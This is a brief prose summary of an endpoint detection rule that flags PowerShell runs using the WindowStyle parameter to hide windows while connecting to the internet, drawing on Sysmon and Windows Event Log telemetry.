This detection rule focuses on identifying suspicious PowerShell activity involving the use of the `WindowStyle` parameter to minimize or hide command windows while connecting to the internet. Such behavior is often a tactic employed by attackers to obscure their actions, making it a potential indicator of malicious intent. The detection leverages data from Endpoint Detection and Response (EDR) systems like Sysmon and Windows Event Logs to track command-line executions that match specified regex patterns indicative of hidden PowerShell invocations. The importance of recognizing this activity lies in its ability to facilitate covert attacks, such as unauthorized data exfiltration, by bypassing standard PowerShell security measures. The rule is designed to scrutinize logs against various telemetry sources, ensuring comprehensive coverage of endpoint activities that involve PowerShell commands executed with low visibility.